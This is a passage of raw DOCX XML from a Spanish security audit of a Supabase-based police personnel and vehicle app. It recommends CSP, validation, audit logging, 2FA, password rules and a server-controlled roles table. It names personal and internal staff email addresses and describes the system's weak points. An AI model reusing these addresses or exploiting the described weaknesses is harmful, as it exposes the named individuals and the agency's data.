              <w:t xml:space="preserve">Si un administrador ejecuta SETUP_SUPABASE.sql creyendo que es la configuración actual, todos los usuarios autenticados podrían modificar datos del personal.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1D6A39"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Solución:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1D6A39"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Consolidar en un único archivo SQL de configuración. Eliminar o renombrar SETUP_SUPABASE.sql para que quede claro que es obsoleto. Agregar comentarios de versión y fecha en el archivo SQL vigente.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A5276" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">3. MEJORAS RECOMENDADAS (no son vulnerabilidades)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Estas mejoras no son fallas de seguridad activas, pero elevarían significativamente el nivel de protección del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Content Security Policy (CSP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La aplicación no tiene una Content Security Policy configurada. Una CSP es la segunda línea de defensa contra XSS: incluso si escapeHTML() falla en algún lugar, una CSP bien configurada puede impedir que el código malicioso se ejecute o que exfiltre datos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ejemplo de CSP adecuada para esta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2833" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9DFBF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Content-Security-Policy: default-src 'self'; connect-src 'self' https://*.supabase.co; script-src 'self' https://cdn.jsdelivr.net; img-src 'self' data: https://*.supabase.co; style-src 'self' https://fonts.googleapis.com; font-src https://fonts.gstatic.com;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Validación server-side de datos de entrada</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Los formularios de personal y vehículos tienen validación básica de campos requeridos (nombre, jerarquía, legajo), pero no validan formatos. Los campos de fecha aceptan cualquier texto, los legajos no verifican formato, los emails no se validan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Recomendación: agregar validación de formato en el cliente (regex para fechas DD/MM/AAAA, emails, teléfonos) y, opcionalmente, CHECK constraints en la base de datos de Supabase para las columnas críticas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 Audit log de acciones sensibles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No existe registro de quién realizó qué acción y cuándo. Si alguien modifica o elimina datos del personal, no hay forma de saber quién fue. Esto es especialmente importante para un sistema con datos de seguridad pública.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Recomendación: crear una tabla audit_log en Supabase con trigger AFTER UPDATE/DELETE en las tablas sensibles, que registre (tabla, registro_id, accion, usuario_email, timestamp, valor_anterior). Los registros de esta tabla son SOLO de lectura para todos los roles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4 Autenticación de dos factores (2FA) para rol jefe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El rol 'jefe' tiene acceso a datos completos del personal policial. Actualmente solo requiere email + contraseña. Si la contraseña del jefe es comprometida, el atacante tiene acceso total.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Recomendación: Supabase soporta TOTP (Google Authenticator, Authy). Habilitar y requerir 2FA para todos los usuarios con rol 'jefe' como condición de acceso al tab Admin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5 Política de contraseñas y sesiones</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No hay política de contraseñas visible ni rotación periódica. Los emails internos son @diprotran.internal, lo que sugiere que las cuentas son administradas manualmente. Asegurarse de:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Contraseñas de al menos 12 caracteres</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Rotación cada 90 días para el rol jefe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Revocar inmediatamente el acceso al desafectar a un efectivo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Revisar que los emails en SETUP_PERSONAL_PII.sql (nohasof03@gmail.com, ccabralblanco@gmail.com, etc.) NO sean las credenciales de acceso — usar emails @diprotran.internal exclusivamente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.6 Eliminación de información sensible en comentarios del código</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El archivo historial.js contiene en un comentario los emails internos de los usuarios del sistema: guardia@diprotran.internal, villalba@diprotran.internal, cabral@diprotran.internal. Aunque son emails internos, esto es información que no debe estar en el código fuente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Recomendación: eliminar estos comentarios con información de usuarios reales. Documentar los usuarios en el README interno o en un canal seguro, no en el código.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A5276" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">4. QUÉ AGREGARÍA AL SISTEMA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 Tabla de roles controlada por el sistema</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">En lugar de roles en user_metadata (modificables por el usuario), una tabla como esta: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2833" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9DFBF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CREATE TABLE roles (</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9DFBF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  user_id UUID REFERENCES auth.users(id) PRIMARY KEY,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9DFBF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  rol TEXT CHECK (rol IN ('oficial','jefe')) NOT NULL DEFAULT 'oficial'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9DFBF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FDFEFE"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">-- Solo service_role puede modificar esta tabla</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FDFEFE"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">-- Las políticas RLS usan: (SELECT rol FROM roles WHERE user_id = auth.uid())</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 Sistema de audit log automático</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un trigger en PostgreSQL que registre automáticamente todos los cambios en tablas sensibles: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2833" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9DFBF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CREATE TABLE audit_log (</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9DFBF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  id BIGSERIAL PRIMARY KEY,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9DFBF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  tabla TEXT, accion TEXT, registro_id TEXT,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9DFBF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  usuario_id UUID, usuario_email TEXT,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9DFBF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  valor_anterior JSONB, valor_nuevo JSONB,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9DFBF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  timestamp TIMESTAMPTZ DEFAULT NOW()</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9DFBF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 Rate limiting en login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Supabase ya tiene rate limiting interno, pero agregaría un contador en el cliente que bloquee temporalmente el formulario de login luego de 5 intentos fallidos consecutivos, mostrando un mensaje claro. Esto agrega fricción contra ataques de fuerza bruta sin necesidad de infraestructura adicional.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4 Expiración automática de sesión por inactividad</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Agregar un detector de inactividad (sin click/teclado por N minutos) que cierre la sesión automáticamente. En un entorno policial donde los dispositivos son compartidos o pueden dejarse desbloqueados, esto previene accesos no autorizados por abandono del dispositivo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementación sugerida: evento mousemove/keydown que reinicie un timer de 30 minutos. Al expirar, llama a supabase.auth.signOut() y muestra la pantalla de login.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.5 Verificación de integridad del Service Worker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Agregar Subresource Integrity (SRI) a los scripts de CDN (Supabase JS, Tailwind). Esto garantiza que si los CDNs fueran comprometidos, el navegador rechazaría el script malicioso.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A5276" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="400"/>
      </w:pPr>
      <w:r>
